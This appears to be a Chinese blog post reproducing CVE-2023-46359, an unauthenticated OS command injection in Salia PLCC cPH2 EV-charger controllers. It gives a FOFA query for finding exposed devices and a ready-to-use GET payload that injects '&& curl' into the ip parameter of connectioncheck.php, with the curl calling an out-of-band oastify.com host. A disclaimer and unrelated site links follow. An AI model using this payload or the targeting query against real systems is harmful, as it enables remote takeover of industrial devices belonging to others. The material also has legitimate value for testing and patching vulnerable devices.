【漏洞复现】Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)

0x01 漏洞概述

Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞,该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。

0x02 测绘语句

fofa:"Salia PLCC"

0x03 漏洞复现

​
payload:GET /connectioncheck.php?
ip=url_encode(127.0.0.1 && curl http://dnslog) HTTP/1.1

漏洞复现:GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+http%3A%2F%2F4kpxqqvqog8u6p2ew6xzh3c7jypvdr1g.oastify.com HTTP/1.1

​

0x04 影响范围

cPH2 v<= 1.87.0

0x05 参考链接

https://github.com/projectdiscovery/nuclei-templates/blob/7f071a1f5a59a3a9812a58e990f266883607b30c/http/cves/2023/CVE-2023-46359.yaml#L12

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

相关推荐
网络安全(king)1 小时前
网络安全攻防学习平台 - 基础关
网络·学习·web安全
李白你好1 小时前
家用无线路由器的 2.4GHz 和 5GHz
运维·网络
嵌入(师)1 小时前
嵌入式驱动开发详解21(网络驱动开发)
网络·驱动开发
Hacker_Nightrain2 小时前
网络安全与加密
安全·web安全
柒烨带你飞2 小时前
路由器的原理
网络·智能路由器·php
xserver22 小时前
ensp 基于EASY IP的公司出口链路配置
网络·tcp/ip·智能路由器
枫零NET2 小时前
学习思考:一日三问(学习篇)之匹配VLAN
网络·学习·交换机
手心里的白日梦3 小时前
UDP传输层通信协议详解
网络·网络协议·udp
红米饭配南瓜汤3 小时前
WebRTC服务质量(11)- Pacer机制(03) IntervalBudget
网络·网络协议·音视频·webrtc·媒体